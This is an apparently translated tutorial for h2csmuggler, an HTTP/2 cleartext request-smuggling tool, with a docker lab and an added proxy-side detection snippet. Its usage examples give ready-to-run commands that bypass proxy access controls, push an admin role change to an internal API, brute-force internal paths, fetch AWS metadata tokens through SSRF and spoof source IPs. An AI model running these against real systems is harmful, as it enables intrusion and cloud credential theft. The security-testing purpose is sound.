
How to use h2csmuggler, a highly concealed plaintext communication tool for HTTP2

2025-04-06 Update | From: SLTechnology News&Howtos > Network Security


Shulou (Shulou.com) 05/31 Report

In this issue, the editor explains how to use h2csmuggler, a highly concealed HTTP/2 plaintext communication tool. The article is rich in content and analyses the topic from a professional point of view. I hope you get something out of it.

Tool introduction

h2csmuggler is a highly concealed HTTP/2 plaintext communication tool. It uses an h2c-compatible back-end server to establish an HTTP/2 cleartext (h2c) connection and hides HTTP traffic behind an insecure proxy_pass configuration on the edge server.

How to test?

The tool applies to any proxy endpoint that forwards the h2c Upgrade header. Because h2c is only supposed to run over a cleartext channel, a detection on an HTTPS service will generally be a true positive.

In contrast, plain HTTP services are likely to produce false positives. For example, an h2c-enabled proxy might answer the Upgrade header itself instead of forwarding it to an h2c back end.

Researchers can use the --scan-list option to test one or more web servers and find affected proxy_pass endpoints. It is recommended that you use a directory list for directory enumeration, such as the following URL text file (urls.txt):

    https://www.example.com/
    https://www.example.com/api/
    https://www.example.com/auth/
    https://www.example.com/admin/
    https://www.example.com/payments/
    ...omitted for brevity...

The following command scans urls.txt with h2csmuggler and sets the number of scanning threads:

    ./h2csmuggler.py --scan-list urls.txt --threads 5

Alternatively, you can test a single endpoint directly with the following command:

    ./h2csmuggler.py -x https://www.example.com/api/ --test

Once we have identified an affected endpoint, we can use it to smuggle requests. We can now access or brute-force internal endpoints of the back-end server and supply custom verbs or headers. In the following example we show how the traffic-hiding property of h2c bypasses the proxy's deny rule and reaches the internal /flag endpoint.
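The whole technique above depends on the edge proxy forwarding a hop-by-hop Upgrade to the back end. The following added example (not code from h2csmuggler or from the original article) takes a reverse proxy's view of that request: it recognises the h2c upgrade attempt and computes the header set a correctly behaving proxy forwards, i.e. with Connection and every header it names removed, which is what closes the path. The raw request and the HTTP2-Settings value are constructed samples.

```python
from typing import List, Set, Tuple

# Headers a proxy must never forward regardless of the Connection header
# (RFC 7230 section 6.1 treats these as hop-by-hop).
ALWAYS_HOP_BY_HOP = {
    "connection", "keep-alive", "proxy-connection", "te", "trailer",
    "transfer-encoding", "upgrade",
}

Headers = List[Tuple[str, str]]


def parse_request_head(raw: bytes) -> Tuple[str, Headers]:
    """Split a raw HTTP/1.1 request head into request line and header pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def connection_tokens(headers: Headers) -> Set[str]:
    """Lower-cased tokens listed in the Connection header(s)."""
    tokens: Set[str] = set()
    for name, value in headers:
        if name.lower() == "connection":
            tokens.update(t.strip().lower() for t in value.split(",") if t.strip())
    return tokens


def is_h2c_upgrade(headers: Headers) -> bool:
    """True when the request asks for an HTTP/2 cleartext (h2c) upgrade."""
    upgrade = [v for n, v in headers if n.lower() == "upgrade"]
    return any(v.lower() == "h2c" for v in upgrade) and "upgrade" in connection_tokens(headers)


def sanitize_for_forwarding(headers: Headers) -> Headers:
    """Drop Connection, everything it names (e.g. HTTP2-Settings) and the fixed set."""
    drop = ALWAYS_HOP_BY_HOP | connection_tokens(headers)
    return [(n, v) for n, v in headers if n.lower() not in drop]


# Constructed sample of the kind of request an h2c upgrade client sends to the edge.
SAMPLE = (b"GET /flag HTTP/1.1\r\nHost: backend\r\nUpgrade: h2c\r\n"
          b"HTTP2-Settings: AAMAAABkAAQAAP__\r\nConnection: Upgrade, HTTP2-Settings\r\n"
          b"User-Agent: example-client/1.0\r\n\r\n")


def check_sample() -> Tuple[bool, List[str]]:
    """Return (is h2c upgrade?, header names a safe proxy would still forward)."""
    _, headers = parse_request_head(SAMPLE)
    return is_h2c_upgrade(headers), [n for n, _ in sanitize_for_forwarding(headers)]
```

Logging a hit from is_h2c_upgrade at the edge is a cheap detection for the scan described above, and forwarding only the sanitized header list is the mitigation.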

Tool dependencies

The tool's only dependency is the Python hyper-h2 library, installed as follows:

    pip3 install h2

Test environment and demo

This test environment lets us try h2csmuggler in a controlled setting. docker-compose brings up three proxies that point to an h2c-enabled Golang back-end server:

    TCP port: Description
    8000: HTTP h2c backend
    8001: HAProxy -> h2c backend (insecure default configuration)
    8002: nginx -> h2c backend (insecure custom configuration)
    8003: Nuster -> HAProxy -> h2c backend (insecure configuration with multiple layers of proxies)

We can generate the certificates and start the docker-compose environment with the following commands:

    # Generate certs
    ./configs/generate-certificates.sh
    # Activate services
    docker-compose up

Next, we try to reach the forbidden endpoints through the HAProxy server (port 8001):

We can use the --test (or -t) option of h2csmuggler to confirm the proxy's insecure configuration:

Now we use h2csmuggler to perform an h2c upgrade, tunnel our HTTP/2 traffic through the proxy, and then request the /flag endpoint from the back-end server, bypassing the proxy's access control:

Tool usage

h2csmuggler uses curl-like syntax for its requests:

    usage: h2csmuggler.py [-h] [--scan-list SCAN_LIST] [--threads THREADS]
                          [--upgrade-only] [-x PROXY] [-i WORDLIST] [-X REQUEST]
                          [-d DATA] [-H HEADER] [-m MAX_TIME] [-t] [-v]
                          [url]

    Detect and exploit insecure forwarding of h2c upgrades.

    positional arguments:
      url

    optional arguments:
      -h, --help            show this help message and exit
      --scan-list SCAN_LIST
                            list of URLs for scanning
      --threads THREADS     # of threads (for use with --scan-list)
      --upgrade-only        drop HTTP2-Settings from outgoing Connection header
      -x PROXY, --proxy PROXY
                            proxy server to try to bypass
      -i WORDLIST, --wordlist WORDLIST
                            list of paths to bruteforce
      -X REQUEST, --request REQUEST
                            smuggled verb
      -d DATA, --data DATA  smuggled data
      -H HEADER, --header HEADER
                            smuggled headers
      -m MAX_TIME, --max-time MAX_TIME
                            socket timeout in seconds (type: float, default 10)
      -t, --test            test a single proxy server
      -v, --verbose         verbose

Sample tool usage

1. Scan a list of URLs to identify affected endpoints:

    ./h2csmuggler.py --scan-list urls.txt --threads 5

Alternatively, redirect the results and errors to files:

    ./h2csmuggler.py --scan-list urls.txt --threads 5 2>errors.txt 1>results.txt

2. Send a crafted POST request past the edge server to an internal endpoint:

    ./h2csmuggler.py -x https://edgeserver -X POST -d '{"user":128457, "role":"admin"}' -H "Content-Type: application/json" -H "X-SYSTEM-USER: true" http://backend/api/internal/user/permissions

3. Use HTTP/2 multiplexing to brute-force internal endpoints:

    ./h2csmuggler.py -x https://edgeserver -i dirs.txt http://localhost/

4. Use Host header SSRF to obtain a token:

    ./h2csmuggler.py -x https://edgeserver -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token

Then send the token:

    ./h2csmuggler.py -x https://edgeserver -H "x-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/

5. Use the X-Forwarded-For header to spoof the source IP address and reach the internal dashboard:

    ./h2csmuggler.py -x https://edgeserver -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 172.16.0.1" http://backend/system/dashboard

That is how the highly concealed HTTP/2 plaintext communication tool h2csmuggler is used. If you have similar questions, refer to the analysis above. To learn more, you are welcome to follow the industry information channel.
